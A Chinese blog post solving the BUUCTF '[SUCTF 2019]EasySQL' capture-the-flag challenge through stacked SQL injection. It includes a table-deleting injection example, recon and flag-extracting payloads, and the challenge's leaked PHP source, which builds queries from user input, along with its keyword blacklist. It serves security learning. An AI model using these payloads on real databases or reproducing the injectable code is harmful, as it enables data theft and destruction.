buuctf [SUCTF 2019]EasySQL

最新推荐文章于 2024-07-26 09:40:31 发布

exploitsec

最新推荐文章于 2024-07-26 09:40:31 发布

阅读量354

点赞数

分类专栏： buuctf web 文章标签：网络安全数据库

本文链接：https://blog.csdn.net/qq_36241198/article/details/114276086

版权

buuctf web 专栏收录该内容

14 篇文章 2 订阅

订阅专栏

#这里题目也是类似于[强网杯 2019]随便注

堆叠注入原理

在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为： Select * from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。

测试发现过滤了很多字符，不过可以堆叠注入

1;show databases; #查询数据库

在这里插入图片描述

1;show tables; #查询数据库的表

在这里插入图片描述
这里发现了一个flag表,查询flag表的字段,发现不行被过滤了

然后看别人wp说比赛的时候泄露了源码的，啧啧啧

<?php
    session_start();

    include_once "config.php";

    $post = array();
    $get = array();
    global $MysqlLink;

    //GetPara();
    $MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
    if(!$MysqlLink){
        die("Mysql Connect Error!");
    }
    $selectDB = mysqli_select_db($MysqlLink,$dataName);
    if(!$selectDB){
        die("Choose Database Error!");
    }

    foreach ($_POST as $k=>$v){
        if(!empty($v)&&is_string($v)){
            $post[$k] = trim(addslashes($v));
        }
    }
    foreach ($_GET as $k=>$v){
        }
    }
    //die();
    ?>

<html>
<head>
</head>

<body>

<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>

<?php

    if(isset($post['query'])){
        $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
        //var_dump(preg_match("/{$BlackList}/is",$post['query']));
        if(preg_match("/{$BlackList}/is",$post['query'])){
            //echo $post['query'];
            die("Nonono.");
        }
        if(strlen($post['query'])>40){
            die("Too long.");
        }
        $sql = "select ".$post['query']."||flag from Flag";
        mysqli_multi_query($MysqlLink,$sql);
        do{
            if($res = mysqli_store_result($MysqlLink)){
                while($row = mysqli_fetch_row($res)){
                    print_r($row);
                }
            }
        }while(@mysqli_next_result($MysqlLink));

    }

    ?>

看到mysql_multi_query()，可以堆叠注入

$sql = "select ".$post['query']."||flag from Flag";   #关键sql语句

官方解法:

给的 payload 是 1;set sql_mode=PIPES_AS_CONCAT;select 1
拼接一下就是 select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag

关于 sql_mode : 它定义了 MySQL 应支持的 SQL 语法，以及应该在数据上执行何种确认检查，其中的 PIPES_AS_CONCAT 将 || 视为字符串的连接操作符而非 "或" 运算符

实际运行为select 1;set sql_mode=PIPES_AS_CONCAT;select "1"+flag from Flag
关于 sql_mode 更多可以查看这个链接 :https://www.cnblogs.com/piperck/p/9835695.html

#在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接，但在mysql 缺省不支持。
需要调整mysql 的sql_mode 模式：pipes_as_concat 来实现oracle 的一些功能

关于非预期解 : *,1

而*号为查询所有数据，即实现了对flag的查询
拼接一下，不难理解 : select *,1||flag from Flag
等同于 select *,1 from Flag

在这里插入图片描述

exploitsec

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
buuctf [SUCTF 2019]EasySQL

#这里题目也是类似于[强网杯 2019]随便注堆叠注入原理在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM product
复制链接

扫一扫

专栏目录